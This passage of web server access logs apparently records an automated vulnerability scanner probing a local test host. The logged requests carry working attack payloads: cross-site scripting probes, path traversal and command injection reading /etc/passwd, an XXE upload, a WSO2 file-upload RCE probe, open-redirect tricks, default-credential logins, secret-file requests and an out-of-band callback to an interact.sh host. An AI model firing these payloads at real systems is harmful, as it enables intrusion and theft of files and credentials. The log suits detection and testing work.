Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"--29KAnkBcwpbL8TZe7UhDBCIRtRl\x0D\x0AContent-Disposition: form-data; name=\x2229KAnfYFKR2k5vCIbWd0TKaV0jj\x22; filename=\x2229KAngqJf97pSzIN2Tv5CjmJdpJ.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KAnkBcwpbL8TZe7UhDBCIRtRl\x0D\x0AContent-Disposition: form-data; name=\x2229KAnjuAkmuZqcCvASzJP1IEEs2\x22; filename=\x2229KAni18mZWEZxNgmeSs13ReWG1.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KAnkBcwpbL8TZe7UhDBCIRtRl--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.061","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29kangnndahbcma0flrq7whcsok.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; 